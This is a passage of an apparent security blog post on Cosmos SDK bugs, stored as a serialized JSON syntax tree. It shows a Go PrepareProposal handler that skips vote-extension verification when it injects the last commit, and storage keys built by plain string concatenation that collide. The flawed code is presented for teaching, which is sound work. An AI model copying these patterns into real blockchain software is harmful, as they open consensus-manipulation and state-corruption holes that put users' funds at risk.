req",{"type":28,"tag":116,"props":83860,"children":83861},{"style":266},[83862],{"type":33,"value":141},{"type":28,"tag":116,"props":83864,"children":83865},{"style":272},[83866],{"type":33,"value":83097},{"type":28,"tag":116,"props":83868,"children":83869},{"style":370},[83870],{"type":33,"value":13860},{"type":28,"tag":116,"props":83872,"children":83873},{"style":272},[83874],{"type":33,"value":25498},{"type":28,"tag":116,"props":83876,"children":83877},{"style":266},[83878],{"type":33,"value":141},{"type":28,"tag":116,"props":83880,"children":83881},{"style":282},[83882],{"type":33,"value":83298},{"type":28,"tag":116,"props":83884,"children":83885},{"style":266},[83886],{"type":33,"value":1540},{"type":28,"tag":116,"props":83888,"children":83889},{"style":272},[83890],{"type":33,"value":83891},"Abci",{"type":28,"tag":116,"props":83893,"children":83894},{"style":266},[83895],{"type":33,"value":141},{"type":28,"tag":116,"props":83897,"children":83898},{"style":272},[83899],{"type":33,"value":83900},"VoteExtensionsEnableHeight",{"type":28,"tag":116,"props":83902,"children":83903},{"style":370},[83904],{"type":33,"value":13851},{"type":28,"tag":116,"props":83906,"children":83907},{"style":272},[83908],{"type":33,"value":83909}," collectSigs",{"type":28,"tag":116,"props":83911,"children":83912},{"style":266},[83913],{"type":33,"value":1291},{"type":28,"tag":116,"props":83915,"children":83916},{"class":245,"line":400},[83917],{"type":28,"tag":116,"props":83918,"children":83919},{"style":250},[83920],{"type":33,"value":83921},"            //Fails to verify vote extensions with VerifyVoteExtension rules\n",{"type":28,"tag":116,"props":83923,"children":83924},{"class":245,"line":614},[83925,83929,83933,83938,83942,83947,83951,83955,83959,83964,83968,83973,83977,83981,83985,83989,83993,83997,84001,84006,84010,84014,84018,84023],{"type":28,"tag":116,"props":83926,"children":83927},{"style":272},[83928],{"type":33,"value":81954},{"type":28,"tag":116,"props":83930,"children":83931},{"style":370},[83932],{"type":33,"value":76036},{"type":28,"tag":116,"props":83934,"children":83935},{"style":272},[83936],{"type":33,"value":83937}," baseapp",{"type":28,"tag":116,"props":83939,"children":83940},{"style":266},[83941],{"type":33,"value":141},{"type":28,"tag":116,"props":83943,"children":83944},{"style":282},[83945],{"type":33,"value":83946},"ValidateVoteExtensions",{"type":28,"tag":116,"props":83948,"children":83949},{"style":266},[83950],{"type":33,"value":313},{"type":28,"tag":116,"props":83952,"children":83953},{"style":272},[83954],{"type":33,"value":19944},{"type":28,"tag":116,"props":83956,"children":83957},{"style":266},[83958],{"type":33,"value":825},{"type":28,"tag":116,"props":83960,"children":83961},{"style":272},[83962],{"type":33,"value":83963},"h",{"type":28,"tag":116,"props":83965,"children":83966},{"style":266},[83967],{"type":33,"value":141},{"type":28,"tag":116,"props":83969,"children":83970},{"style":272},[83971],{"type":33,"value":83972},"stakingKeeper",{"type":28,"tag":116,"props":83974,"children":83975},{"style":266},[83976],{"type":33,"value":825},{"type":28,"tag":116,"props":83978,"children":83979},{"style":272},[83980],{"type":33,"value":83767},{"type":28,"tag":116,"props":83982,"children":83983},{"style":266},[83984],{"type":33,"value":141},{"type":28,"tag":116,"props":83986,"children":83987},{"style":272},[83988],{"type":33,"value":83097},{"type":28,"tag":116,"props":83990,"children":83991},{"style":266},[83992],{"type":33,"value":825},{"type":28,"tag":116,"props":83994,"children":83995},{"style":272},[83996],{"type":33,"value":19944},{"type":28,"tag":116,"props":83998,"children":83999},{"style":266},[84000],{"type":33,"value":141},{"type":28,"tag":116,"props":84002,"children":84003},{"style":282},[84004],{"type":33,"value":84005},"ChainID",{"type":28,"tag":116,"props":84007,"children":84008},{"style":266},[84009],{"type":33,"value":18038},{"type":28,"tag":116,"props":84011,"children":84012},{"style":272},[84013],{"type":33,"value":83767},{"type":28,"tag":116,"props":84015,"children":84016},{"style":266},[84017],{"type":33,"value":141},{"type":28,"tag":116,"props":84019,"children":84020},{"style":272},[84021],{"type":33,"value":84022},"LocalLastCommit",{"type":28,"tag":116,"props":84024,"children":84025},{"style":266},[84026],{"type":33,"value":2830},{"type":28,"tag":116,"props":84028,"children":84029},{"class":245,"line":631},[84030,84034,84038,84042,84046],{"type":28,"tag":116,"props":84031,"children":84032},{"style":260},[84033],{"type":33,"value":58419},{"type":28,"tag":116,"props":84035,"children":84036},{"style":272},[84037],{"type":33,"value":48142},{"type":28,"tag":116,"props":84039,"children":84040},{"style":370},[84041],{"type":33,"value":64006},{"type":28,"tag":116,"props":84043,"children":84044},{"style":376},[84045],{"type":33,"value":81537},{"type":28,"tag":116,"props":84047,"children":84048},{"style":266},[84049],{"type":33,"value":1291},{"type":28,"tag":116,"props":84051,"children":84052},{"class":245,"line":665},[84053,84057,84061,84065],{"type":28,"tag":116,"props":84054,"children":84055},{"style":260},[84056],{"type":33,"value":60347},{"type":28,"tag":116,"props":84058,"children":84059},{"style":376},[84060],{"type":33,"value":81537},{"type":28,"tag":116,"props":84062,"children":84063},{"style":266},[84064],{"type":33,"value":825},{"type":28,"tag":116,"props":84066,"children":84067},{"style":272},[84068],{"type":33,"value":83257},{"type":28,"tag":116,"props":84070,"children":84071},{"class":245,"line":713},[84072],{"type":28,"tag":116,"props":84073,"children":84074},{"style":266},[84075],{"type":33,"value":58503},{"type":28,"tag":116,"props":84077,"children":84078},{"class":245,"line":750},[84079,84084,84088,84092,84096,84101,84105,84110,84114,84118,84122,84126],{"type":28,"tag":116,"props":84080,"children":84081},{"style":272},[84082],{"type":33,"value":84083},"            injection",{"type":28,"tag":116,"props":84085,"children":84086},{"style":266},[84087],{"type":33,"value":825},{"type":28,"tag":116,"props":84089,"children":84090},{"style":272},[84091],{"type":33,"value":1907},{"type":28,"tag":116,"props":84093,"children":84094},{"style":370},[84095],{"type":33,"value":2226},{"type":28,"tag":116,"props":84097,"children":84098},{"style":272},[84099],{"type":33,"value":84100}," json",{"type":28,"tag":116,"props":84102,"children":84103},{"style":266},[84104],{"type":33,"value":141},{"type":28,"tag":116,"props":84106,"children":84107},{"style":282},[84108],{"type":33,"value":84109},"Marshal",{"type":28,"tag":116,"props":84111,"children":84112},{"style":266},[84113],{"type":33,"value":313},{"type":28,"tag":116,"props":84115,"children":84116},{"style":272},[84117],{"type":33,"value":83767},{"type":28,"tag":116,"props":84119,"children":84120},{"style":266},[84121],{"type":33,"value":141},{"type":28,"tag":116,"props":84123,"children":84124},{"style":272},[84125],{"type":33,"value":84022},{"type":28,"tag":116,"props":84127,"children":84128},{"style":266},[84129],{"type":33,"value":2830},{"type":28,"tag":116,"props":84131,"children":84132},{"class":245,"line":779},[84133,84137,84141,84145,84149],{"type":28,"tag":116,"props":84134,"children":84135},{"style":260},[84136],{"type":33,"value":58419},{"type":28,"tag":116,"props":84138,"children":84139},{"style":272},[84140],{"type":33,"value":48142},{"type":28,"tag":116,"props":84142,"children":84143},{"style":370},[84144],{"type":33,"value":64006},{"type":28,"tag":116,"props":84146,"children":84147},{"style":376},[84148],{"type":33,"value":81537},{"type":28,"tag":116,"props":84150,"children":84151},{"style":266},[84152],{"type":33,"value":1291},{"type":28,"tag":116,"props":84154,"children":84155},{"class":245,"line":796},[84156,84161,84165,84170,84174,84178,84182,84187,84191,84196,84200,84204],{"type":28,"tag":116,"props":84157,"children":84158},{"style":272},[84159],{"type":33,"value":84160},"                h",{"type":28,"tag":116,"props":84162,"children":84163},{"style":266},[84164],{"type":33,"value":141},{"type":28,"tag":116,"props":84166,"children":84167},{"style":272},[84168],{"type":33,"value":84169},"logger",{"type":28,"tag":116,"props":84171,"children":84172},{"style":266},[84173],{"type":33,"value":141},{"type":28,"tag":116,"props":84175,"children":84176},{"style":282},[84177],{"type":33,"value":37022},{"type":28,"tag":116,"props":84179,"children":84180},{"style":266},[84181],{"type":33,"value":313},{"type":28,"tag":116,"props":84183,"children":84184},{"style":563},[84185],{"type":33,"value":84186},"\"failed to marshal extended votes\"",{"type":28,"tag":116,"props":84188,"children":84189},{"style":266},[84190],{"type":33,"value":825},{"type":28,"tag":116,"props":84192,"children":84193},{"style":563},[84194],{"type":33,"value":84195},"\"err\"",{"type":28,"tag":116,"props":84197,"children":84198},{"style":266},[84199],{"type":33,"value":825},{"type":28,"tag":116,"props":84201,"children":84202},{"style":272},[84203],{"type":33,"value":1907},{"type":28,"tag":116,"props":84205,"children":84206},{"style":266},[84207],{"type":33,"value":2830},{"type":28,"tag":116,"props":84209,"children":84210},{"class":245,"line":847},[84211,84215,84219,84223],{"type":28,"tag":116,"props":84212,"children":84213},{"style":260},[84214],{"type":33,"value":60347},{"type":28,"tag":116,"props":84216,"children":84217},{"style":376},[84218],{"type":33,"value":81537},{"type":28,"tag":116,"props":84220,"children":84221},{"style":266},[84222],{"type":33,"value":825},{"type":28,"tag":116,"props":84224,"children":84225},{"style":272},[84226],{"type":33,"value":83257},{"type":28,"tag":116,"props":84228,"children":84229},{"class":245,"line":898},[84230],{"type":28,"tag":116,"props":84231,"children":84232},{"style":266},[84233],{"type":33,"value":58503},{"type":28,"tag":116,"props":84235,"children":84236},{"class":245,"line":907},[84237],{"type":28,"tag":116,"props":84238,"children":84239},{"style":370},[84240],{"type":33,"value":82136},{"type":28,"tag":116,"props":84242,"children":84243},{"class":245,"line":981},[84244],{"type":28,"tag":116,"props":84245,"children":84246},{"style":266},[84247],{"type":33,"value":1954},{"type":28,"tag":116,"props":84249,"children":84250},{"class":245,"line":1011},[84251,84256,84260,84264,84268,84273,84277,84282,84286,84290,84294,84298],{"type":28,"tag":116,"props":84252,"children":84253},{"style":272},[84254],{"type":33,"value":84255},"        defaultRes",{"type":28,"tag":116,"props":84257,"children":84258},{"style":266},[84259],{"type":33,"value":825},{"type":28,"tag":116,"props":84261,"children":84262},{"style":272},[84263],{"type":33,"value":1907},{"type":28,"tag":116,"props":84265,"children":84266},{"style":370},[84267],{"type":33,"value":76036},{"type":28,"tag":116,"props":84269,"children":84270},{"style":272},[84271],{"type":33,"value":84272}," h",{"type":28,"tag":116,"props":84274,"children":84275},{"style":266},[84276],{"type":33,"value":141},{"type":28,"tag":116,"props":84278,"children":84279},{"style":282},[84280],{"type":33,"value":84281},"defaultPrepareProposal",{"type":28,"tag":116,"props":84283,"children":84284},{"style":266},[84285],{"type":33,"value":313},{"type":28,"tag":116,"props":84287,"children":84288},{"style":272},[84289],{"type":33,"value":19944},{"type":28,"tag":116,"props":84291,"children":84292},{"style":266},[84293],{"type":33,"value":825},{"type":28,"tag":116,"props":84295,"children":84296},{"style":272},[84297],{"type":33,"value":83767},{"type":28,"tag":116,"props":84299,"children":84300},{"style":266},[84301],{"type":33,"value":2830},{"type":28,"tag":116,"props":84303,"children":84304},{"class":245,"line":1029},[84305],{"type":28,"tag":116,"props":84306,"children":84307},{"style":370},[84308],{"type":33,"value":81461},{"type":28,"tag":116,"props":84310,"children":84311},{"class":245,"line":1038},[84312,84317,84321,84326,84330],{"type":28,"tag":116,"props":84313,"children":84314},{"style":272},[84315],{"type":33,"value":84316},"        proposalTxs",{"type":28,"tag":116,"props":84318,"children":84319},{"style":370},[84320],{"type":33,"value":76036},{"type":28,"tag":116,"props":84322,"children":84323},{"style":272},[84324],{"type":33,"value":84325}," defaultRes",{"type":28,"tag":116,"props":84327,"children":84328},{"style":266},[84329],{"type":33,"value":141},{"type":28,"tag":116,"props":84331,"children":84332},{"style":272},[84333],{"type":33,"value":84334},"Txs\n",{"type":28,"tag":116,"props":84336,"children":84337},{"class":245,"line":1047},[84338,84342,84346,84350,84354],{"type":28,"tag":116,"props":84339,"children":84340},{"style":260},[84341],{"type":33,"value":2943},{"type":28,"tag":116,"props":84343,"children":84344},{"style":272},[84345],{"type":33,"value":83837},{"type":28,"tag":116,"props":84347,"children":84348},{"style":370},[84349],{"type":33,"value":64006},{"type":28,"tag":116,"props":84351,"children":84352},{"style":376},[84353],{"type":33,"value":81537},{"type":28,"tag":116,"props":84355,"children":84356},{"style":266},[84357],{"type":33,"value":1291},{"type":28,"tag":116,"props":84359,"children":84360},{"class":245,"line":1071},[84361,84366,84370,84374,84379,84384,84388,84393,84397,84402,84406],{"type":28,"tag":116,"props":84362,"children":84363},{"style":272},[84364],{"type":33,"value":84365},"            proposalTxs",{"type":28,"tag":116,"props":84367,"children":84368},{"style":370},[84369],{"type":33,"value":2226},{"type":28,"tag":116,"props":84371,"children":84372},{"style":282},[84373],{"type":33,"value":77316},{"type":28,"tag":116,"props":84375,"children":84376},{"style":266},[84377],{"type":33,"value":84378},"([][]",{"type":28,"tag":116,"props":84380,"children":84381},{"style":339},[84382],{"type":33,"value":84383},"byte",{"type":28,"tag":116,"props":84385,"children":84386},{"style":266},[84387],{"type":33,"value":76238},{"type":28,"tag":116,"props":84389,"children":84390},{"style":272},[84391],{"type":33,"value":84392},"injection",{"type":28,"tag":116,"props":84394,"children":84395},{"style":266},[84396],{"type":33,"value":76257},{"type":28,"tag":116,"props":84398,"children":84399},{"style":272},[84400],{"type":33,"value":84401},"proposalTxs",{"type":28,"tag":116,"props":84403,"children":84404},{"style":370},[84405],{"type":33,"value":9259},{"type":28,"tag":116,"props":84407,"children":84408},{"style":266},[84409],{"type":33,"value":2830},{"type":28,"tag":116,"props":84411,"children":84412},{"class":245,"line":1137},[84413,84418,84422,84426,84430,84434,84438,84443,84447,84452,84456,84460,84464,84468],{"type":28,"tag":116,"props":84414,"children":84415},{"style":272},[84416],{"type":33,"value":84417},"            h",{"type":28,"tag":116,"props":84419,"children":84420},{"style":266},[84421],{"type":33,"value":141},{"type":28,"tag":116,"props":84423,"children":84424},{"style":272},[84425],{"type":33,"value":84169},{"type":28,"tag":116,"props":84427,"children":84428},{"style":266},[84429],{"type":33,"value":141},{"type":28,"tag":116,"props":84431,"children":84432},{"style":282},[84433],{"type":33,"value":24365},{"type":28,"tag":116,"props":84435,"children":84436},{"style":266},[84437],{"type":33,"value":313},{"type":28,"tag":116,"props":84439,"children":84440},{"style":563},[84441],{"type":33,"value":84442},"\"injected local last commit\"",{"type":28,"tag":116,"props":84444,"children":84445},{"style":266},[84446],{"type":33,"value":825},{"type":28,"tag":116,"props":84448,"children":84449},{"style":563},[84450],{"type":33,"value":84451},"\"height\"",{"type":28,"tag":116,"props":84453,"children":84454},{"style":266},[84455],{"type":33,"value":825},{"type":28,"tag":116,"props":84457,"children":84458},{"style":272},[84459],{"type":33,"value":83767},{"type":28,"tag":116,"props":84461,"children":84462},{"style":266},[84463],{"type":33,"value":141},{"type":28,"tag":116,"props":84465,"children":84466},{"style":272},[84467],{"type":33,"value":83097},{"type":28,"tag":116,"props":84469,"children":84470},{"style":266},[84471],{"type":33,"value":2830},{"type":28,"tag":116,"props":84473,"children":84474},{"class":245,"line":1181},[84475],{"type":28,"tag":116,"props":84476,"children":84477},{"style":266},[84478],{"type":33,"value":1954},{"type":28,"tag":116,"props":84480,"children":84481},{"class":245,"line":1212},[84482,84486,84490,84494,84498,84502],{"type":28,"tag":116,"props":84483,"children":84484},{"style":260},[84485],{"type":33,"value":15405},{"type":28,"tag":116,"props":84487,"children":84488},{"style":370},[84489],{"type":33,"value":6813},{"type":28,"tag":116,"props":84491,"children":84492},{"style":339},[84493],{"type":33,"value":83776},{"type":28,"tag":116,"props":84495,"children":84496},{"style":266},[84497],{"type":33,"value":141},{"type":28,"tag":116,"props":84499,"children":84500},{"style":339},[84501],{"type":33,"value":83806},{"type":28,"tag":116,"props":84503,"children":84504},{"style":266},[84505],{"type":33,"value":10547},{"type":28,"tag":116,"props":84507,"children":84508},{"class":245,"line":1254},[84509,84514,84518,84522],{"type":28,"tag":116,"props":84510,"children":84511},{"style":272},[84512],{"type":33,"value":84513},"            Txs",{"type":28,"tag":116,"props":84515,"children":84516},{"style":266},[84517],{"type":33,"value":14994},{"type":28,"tag":116,"props":84519,"children":84520},{"style":272},[84521],{"type":33,"value":84401},{"type":28,"tag":116,"props":84523,"children":84524},{"style":266},[84525],{"type":33,"value":3178},{"type":28,"tag":116,"props":84527,"children":84528},{"class":245,"line":1262},[84529,84534],{"type":28,"tag":116,"props":84530,"children":84531},{"style":266},[84532],{"type":33,"value":84533},"        }, ",{"type":28,"tag":116,"props":84535,"children":84536},{"style":376},[84537],{"type":33,"value":76262},{"type":28,"tag":116,"props":84539,"children":84540},{"class":245,"line":1294},[84541],{"type":28,"tag":116,"props":84542,"children":84543},{"style":266},[84544],{"type":33,"value":3025},{"type":28,"tag":116,"props":84546,"children":84547},{"class":245,"line":1334},[84548],{"type":28,"tag":116,"props":84549,"children":84550},{"style":266},[84551],{"type":33,"value":406},{"type":28,"tag":29,"props":84553,"children":84554},{},[84555,84557,84562,84563,84568,84570,84577],{"type":33,"value":84556},"Aside from the more complex variant, pure validation mismatches are also still prevalent despite being a well-known attack surface. This stems from ",{"type":28,"tag":98,"props":84558,"children":84560},{"className":84559},[],[84561],{"type":33,"value":82926},{"type":33,"value":269},{"type":28,"tag":98,"props":84564,"children":84566},{"className":84565},[],[84567],{"type":33,"value":82994},{"type":33,"value":84569},") rejections by various obscure checks hidden within CometBTF. For example, this commit fixes a bug where ",{"type":28,"tag":87,"props":84571,"children":84574},{"href":84572,"rel":84573},"https://github.com/babylonlabs-io/babylon/commit/aa827f875a16ebf85efee5d9a6c8c4e76dbfb7bd#diff-77659089b31367690393a968f4bfacfd1bf960ed300965729df216a6fb612699",[91],[84575],{"type":33,"value":84576},"PrepareProposal may return a Proposal larger than MaxTxBytes",{"type":33,"value":84578},", which will later get rejected by CometBTF.",{"type":28,"tag":63,"props":84580,"children":84582},{"id":84581},"the-keymaker",[84583],{"type":33,"value":84584},"The Keymaker",{"type":28,"tag":29,"props":84586,"children":84587},{},[84588,84590,84596,84598,84603],{"type":33,"value":84589},"States (persistent storage) are another crucial component in state machines. Cosmos relies on a custom key-value storage called",{"type":28,"tag":98,"props":84591,"children":84593},{"className":84592},[],[84594],{"type":33,"value":84595},"KVStore",{"type":33,"value":84597}," to handle states efficently. In ",{"type":28,"tag":98,"props":84599,"children":84601},{"className":84600},[],[84602],{"type":33,"value":84595},{"type":33,"value":84604},", keys and values are both represented as simple byte slices, requiring developers to handle serialization and deserialization of more intricate structures when working with storage.",{"type":28,"tag":29,"props":84606,"children":84607},{},[84608],{"type":33,"value":84609},"The complexity behind proper data serialization often results in flawed code and security vulnerabilities. Below, we showcase relatively simple (but buggy) implementations and progressively address and mitigate the issues until the code is deemed safe from exploits.",{"type":28,"tag":29,"props":84611,"children":84612},{},[84613,84615,84621],{"type":33,"value":84614},"Let's start by considering a scenario where we need to store the ",{"type":28,"tag":98,"props":84616,"children":84618},{"className":84617},[],[84619],{"type":33,"value":84620},"positionMap",{"type":33,"value":84622}," structure mentioned below into storage.",{"type":28,"tag":234,"props":84624,"children":84626},{"code":84625,"language":75784,"meta":7,"className":75785,"style":7},"type VaultId uint64\ntype Username string\ntype PositionName string\ntype Position struct {\n    data []byte\n}\ntype PositionMap :=\n    map[VaultId]map[Username]map[PositionName]Position\n",[84627],{"type":28,"tag":98,"props":84628,"children":84629},{"__ignoreMap":7},[84630,84646,84663,84679,84698,84713,84720,84737],{"type":28,"tag":116,"props":84631,"children":84632},{"class":245,"line":246},[84633,84637,84642],{"type":28,"tag":116,"props":84634,"children":84635},{"style":376},[84636],{"type":33,"value":32394},{"type":28,"tag":116,"props":84638,"children":84639},{"style":339},[84640],{"type":33,"value":84641}," VaultId",{"type":28,"tag":116,"props":84643,"children":84644},{"style":339},[84645],{"type":33,"value":75822},{"type":28,"tag":116,"props":84647,"children":84648},{"class":245,"line":256},[84649,84653,84658],{"type":28,"tag":116,"props":84650,"children":84651},{"style":376},[84652],{"type":33,"value":32394},{"type":28,"tag":116,"props":84654,"children":84655},{"style":339},[84656],{"type":33,"value":84657}," Username",{"type":28,"tag":116,"props":84659,"children":84660},{"style":339},[84661],{"type":33,"value":84662}," string\n",{"type":28,"tag":116,"props":84664,"children":84665},{"class":245,"line":293},[84666,84670,84675],{"type":28,"tag":116,"props":84667,"children":84668},{"style":376},[84669],{"type":33,"value":32394},{"type":28,"tag":116,"props":84671,"children":84672},{"style":339},[84673],{"type":33,"value":84674}," PositionName",{"type":28,"tag":116,"props":84676,"children":84677},{"style":339},[84678],{"type":33,"value":84662},{"type":28,"tag":116,"props":84680,"children":84681},{"class":245,"line":361},[84682,84686,84690,84694],{"type":28,"tag":116,"props":84683,"children":84684},{"style":376},[84685],{"type":33,"value":32394},{"type":28,"tag":116,"props":84687,"children":84688},{"style":339},[84689],{"type":33,"value":7096},{"type":28,"tag":116,"props":84691,"children":84692},{"style":376},[84693],{"type":33,"value":20814},{"type":28,"tag":116,"props":84695,"children":84696},{"style":266},[84697],{"type":33,"value":1291},{"type":28,"tag":116,"props":84699,"children":84700},{"class":245,"line":387},[84701,84705,84709],{"type":28,"tag":116,"props":84702,"children":84703},{"style":272},[84704],{"type":33,"value":42853},{"type":28,"tag":116,"props":84706,"children":84707},{"style":266},[84708],{"type":33,"value":75847},{"type":28,"tag":116,"props":84710,"children":84711},{"style":339},[84712],{"type":33,"value":83846},{"type":28,"tag":116,"props":84714,"children":84715},{"class":245,"line":400},[84716],{"type":28,"tag":116,"props":84717,"children":84718},{"style":266},[84719],{"type":33,"value":406},{"type":28,"tag":116,"props":84721,"children":84722},{"class":245,"line":614},[84723,84727,84732],{"type":28,"tag":116,"props":84724,"children":84725},{"style":376},[84726],{"type":33,"value":32394},{"type":28,"tag":116,"props":84728,"children":84729},{"style":339},[84730],{"type":33,"value":84731}," PositionMap",{"type":28,"tag":116,"props":84733,"children":84734},{"style":370},[84735],{"type":33,"value":84736}," :=\n",{"type":28,"tag":116,"props":84738,"children":84739},{"class":245,"line":631},[84740,84745,84749,84754,84758,84762,84766,84771,84775,84779,84783,84788,84792],{"type":28,"tag":116,"props":84741,"children":84742},{"style":376},[84743],{"type":33,"value":84744},"    map",{"type":28,"tag":116,"props":84746,"children":84747},{"style":266},[84748],{"type":33,"value":347},{"type":28,"tag":116,"props":84750,"children":84751},{"style":339},[84752],{"type":33,"value":84753},"VaultId",{"type":28,"tag":116,"props":84755,"children":84756},{"style":266},[84757],{"type":33,"value":15074},{"type":28,"tag":116,"props":84759,"children":84760},{"style":376},[84761],{"type":33,"value":66722},{"type":28,"tag":116,"props":84763,"children":84764},{"style":266},[84765],{"type":33,"value":347},{"type":28,"tag":116,"props":84767,"children":84768},{"style":339},[84769],{"type":33,"value":84770},"Username",{"type":28,"tag":116,"props":84772,"children":84773},{"style":266},[84774],{"type":33,"value":15074},{"type":28,"tag":116,"props":84776,"children":84777},{"style":376},[84778],{"type":33,"value":66722},{"type":28,"tag":116,"props":84780,"children":84781},{"style":266},[84782],{"type":33,"value":347},{"type":28,"tag":116,"props":84784,"children":84785},{"style":339},[84786],{"type":33,"value":84787},"PositionName",{"type":28,"tag":116,"props":84789,"children":84790},{"style":266},[84791],{"type":33,"value":15074},{"type":28,"tag":116,"props":84793,"children":84794},{"style":339},[84795],{"type":33,"value":84796},"Position\n",{"type":28,"tag":29,"props":84798,"children":84799},{},[84800,84802,84808],{"type":33,"value":84801},"Given that there are two levels of keys in ",{"type":28,"tag":98,"props":84803,"children":84805},{"className":84804},[],[84806],{"type":33,"value":84807},"PositionMap",{"type":33,"value":84809},", we should try to serialize these three map keys into a hierarchically searchable storage key. The most straightforward mitigation is to convert all fields into strings and concat them together.",{"type":28,"tag":234,"props":84811,"children":84813},{"code":84812,"language":75784,"meta":7,"className":75785,"style":7},"storageKey := fmt.Sprintf(\n    \"%d%s%s\",\n    vaultId,\n    username,\n    positionName,\n)\n",[84814],{"type":28,"tag":98,"props":84815,"children":84816},{"__ignoreMap":7},[84817,84846,84858,84870,84882,84894],{"type":28,"tag":116,"props":84818,"children":84819},{"class":245,"line":246},[84820,84825,84829,84833,84837,84842],{"type":28,"tag":116,"props":84821,"children":84822},{"style":272},[84823],{"type":33,"value":84824},"storageKey",{"type":28,"tag":116,"props":84826,"children":84827},{"style":370},[84828],{"type":33,"value":76036},{"type":28,"tag":116,"props":84830,"children":84831},{"style":272},[84832],{"type":33,"value":81852},{"type":28,"tag":116,"props":84834,"children":84835},{"style":266},[84836],{"type":33,"value":141},{"type":28,"tag":116,"props":84838,"children":84839},{"style":282},[84840],{"type":33,"value":84841},"Sprintf",{"type":28,"tag":116,"props":84843,"children":84844},{"style":266},[84845],{"type":33,"value":3133},{"type":28,"tag":116,"props":84847,"children":84848},{"class":245,"line":256},[84849,84854],{"type":28,"tag":116,"props":84850,"children":84851},{"style":563},[84852],{"type":33,"value":84853},"    \"%d%s%s\"",{"type":28,"tag":116,"props":84855,"children":84856},{"style":266},[84857],{"type":33,"value":3178},{"type":28,"tag":116,"props":84859,"children":84860},{"class":245,"line":293},[84861,84866],{"type":28,"tag":116,"props":84862,"children":84863},{"style":272},[84864],{"type":33,"value":84865},"    vaultId",{"type":28,"tag":116,"props":84867,"children":84868},{"style":266},[84869],{"type":33,"value":3178},{"type":28,"tag":116,"props":84871,"children":84872},{"class":245,"line":361},[84873,84878],{"type":28,"tag":116,"props":84874,"children":84875},{"style":272},[84876],{"type":33,"value":84877},"    username",{"type":28,"tag":116,"props":84879,"children":84880},{"style":266},[84881],{"type":33,"value":3178},{"type":28,"tag":116,"props":84883,"children":84884},{"class":245,"line":387},[84885,84890],{"type":28,"tag":116,"props":84886,"children":84887},{"style":272},[84888],{"type":33,"value":84889},"    positionName",{"type":28,"tag":116,"props":84891,"children":84892},{"style":266},[84893],{"type":33,"value":3178},{"type":28,"tag":116,"props":84895,"children":84896},{"class":245,"line":400},[84897],{"type":28,"tag":116,"props":84898,"children":84899},{"style":266},[84900],{"type":33,"value":2830},{"type":28,"tag":29,"props":84902,"children":84903},{},[84904],{"type":33,"value":84905},"Although plain concatenation allows us to easily construct a storage key, it becomes apparent that this implementation is prone to key collisions.",{"type":28,"tag":234,"props":84907,"children":84909},{"code":84908},"vaultId = 1,  username = \"2a\", positionName = \"b\"\n    => storageKey = \"12ab\"\n\nvaultId = 12, username = \"a\",  positionName = \"b\"\n    => storageKey = \"12ab\"\n",[84910],{"type":28,"tag":98,"props":84911,"children":84912},{"__ignoreMap":7},[84913],{"type":33,"value":84908},{"type":28,"tag":29,"props":84915,"children":84916},{},[84917,84922],{"type":28,"tag":2583,"props":84918,"children":84919},{},[84920],{"type":33,"value":84921},"So, how can we mitigate this issue?",{"type":33,"value":84923},"\nPerhaps we can add a field separator between each field, which would resemble the following:",{"type":28,"tag":234,"props":84925,"children":84927},{"code":84926,"language":75784,"meta":7,"className":75785,"style":7},"const (\n    Seperator = \"|\"\n)\n\nstorageKey := fmt.Sprintf(\n    \"%d%s%s%s%s\",\n    vaultId,\n    Seperator,\n    username,\n    Seperator,\n    positionName,\n)\n",[84928],{"type":28,"tag":98,"props":84929,"children":84930},{"__ignoreMap":7},[84931,84942,84959,84966,84973,85000,85012,85023,85034,85045,85056,85067],{"type":28,"tag":116,"props":84932,"children":84933},{"class":245,"line":246},[84934,84938],{"type":28,"tag":116,"props":84935,"children":84936},{"style":376},[84937],{"type":33,"value":9323},{"type":28,"tag":116,"props":84939,"children":84940},{"style":266},[84941],{"type":33,"value":78186},{"type":28,"tag":116,"props":84943,"children":84944},{"class":245,"line":256},[84945,84950,84954],{"type":28,"tag":116,"props":84946,"children":84947},{"style":272},[84948],{"type":33,"value":84949},"    Seperator",{"type":28,"tag":116,"props":84951,"children":84952},{"style":370},[84953],{"type":33,"value":2226},{"type":28,"tag":116,"props":84955,"children":84956},{"style":563},[84957],{"type":33,"value":84958}," \"|\"\n",{"type":28,"tag":116,"props":84960,"children":84961},{"class":245,"line":293},[84962],{"type":28,"tag":116,"props":84963,"children":84964},{"style":266},[84965],{"type":33,"value":2830},{"type":28,"tag":116,"props":84967,"children":84968},{"class":245,"line":361},[84969],{"type":28,"tag":116,"props":84970,"children":84971},{"emptyLinePlaceholder":19},[84972],{"type":33,"value":1044},{"type":28,"tag":116,"props":84974,"children":84975},{"class":245,"line":387},[84976,84980,84984,84988,84992,84996],{"type":28,"tag":116,"props":84977,"children":84978},{"style":272},[84979],{"type":33,"value":84824},{"type":28,"tag":116,"props":84981,"children":84982},{"style":370},[84983],{"type":33,"value":76036},{"type":28,"tag":116,"props":84985,"children":84986},{"style":272},[84987],{"type":33,"value":81852},{"type":28,"tag":116,"props":84989,"children":84990},{"style":266},[84991],{"type":33,"value":141},{"type":28,"tag":116,"props":84993,"children":84994},{"style":282},[84995],{"type":33,"value":84841},{"type":28,"tag":116,"props":84997,"children":84998},{"style":266},[84999],{"type":33,"value":3133},{"type":28,"tag":116,"props":85001,"children":85002},{"class":245,"line":400},[85003,85008],{"type":28,"tag":116,"props":85004,"children":85005},{"style":563},[85006],{"type":33,"value":85007},"    \"%d%s%s%s%s\"",{"type":28,"tag":116,"props":85009,"children":85010},{"style":266},[85011],{"type":33,"value":3178},{"type":28,"tag":116,"props":85013,"children":85014},{"class":245,"line":614},[85015,85019],{"type":28,"tag":116,"props":85016,"children":85017},{"style":272},[85018],{"type":33,"value":84865},{"type":28,"tag":116,"props":85020,"children":85021},{"style":266},[85022],{"type":33,"value":3178},{"type":28,"tag":116,"props":85024,"children":85025},{"class":245,"line":631},[85026,85030],{"type":28,"tag":116,"props":85027,"children":85028},{"style":272},[85029],{"type":33,"value":84949},{"type":28,"tag":116,"props":85031,"children":85032},{"style":266},[85033],{"type":33,"value":3178},{"type":28,"tag":116,"props":85035,"children":85036},{"class":245,"line":665},[85037,85041],{"type":28,"tag":116,"props":85038,"children":85039},{"style":272},[85040],{"type":33,"value":84877},{"type":28,"tag":116,"props":85042,"children":85043},{"style":266},[85044],{"type":33,"value":3178},{"type":28,"tag":116,"props":85046,"children":85047},{"class":245,"line":713},[85048,85052],{"type":28,"tag":116,"props":85049,"children":85050},{"style":272},[85051],{"type":33,"value":84949},{"type":28,"tag":116,"props":85053,"children":85054},{"style":266},[85055],{"type":33,